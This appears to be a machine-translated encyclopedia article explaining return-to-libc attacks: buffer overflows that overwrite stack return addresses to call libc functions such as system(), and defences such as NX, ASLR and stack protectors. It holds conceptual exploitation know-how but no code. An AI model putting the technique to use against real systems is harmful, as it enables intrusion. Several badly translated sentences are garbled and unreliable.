Return-to-libc attack
Return into libc (including return-to- libc ) is a method to attack computer systems to inflict damage either to abuse (eg in a denial of service attack ) or the host (server ) to run unwanted programs.
Basic principle
Computer programs use a special memory area, the so-called stack to manage variables and return addresses (english return address ) from subroutines. If the stack is now manipulated so that it contains the address of another function instead of the expected return address, this function can be used to perform the desired malicious functions. The " libc " is a collection of functions that provides the C programming language. This is no new feature in the current system must be brought, as is usually required in shellcode exploits. In this collection is, for example, a popular function " system () ", which allows you to run any system programs. It needs doing only one parameter, the command to be executed.
The manipulation of the stack is typically caused by a buffer overflow. This is a variable that can only accommodate a certain number of characters, topped with a longer, well-defined, string then overwrites the return address located behind the variables on the stack. Likewise, the arguments for the desired (libc ) function are written to the stack, for example the address of a character string.
Variables can then create such overflow, if they can be passed, eg in a web address as a parameter, and they are passed around to a CGI program among others. However, is a mandatory requirement for such an attack a vulnerable program that - contrary to conventional programming techniques - the length of the input variables are not checked.
Protection options
Although a protected means of NX -bit non- executable stack can smuggle in malware code injection prevent a return-to- libc attack can still be performed, however, since in this case of already existing code is called. A Save possibility of such attacks can be achieved on 64- bit systems by ASLR. The memory addresses of the system functions are given randomly, an accurate return on these functions so this is unlikely. Stack protection mechanisms such as the Stack Smashing Protector can detect or prevent further attacks.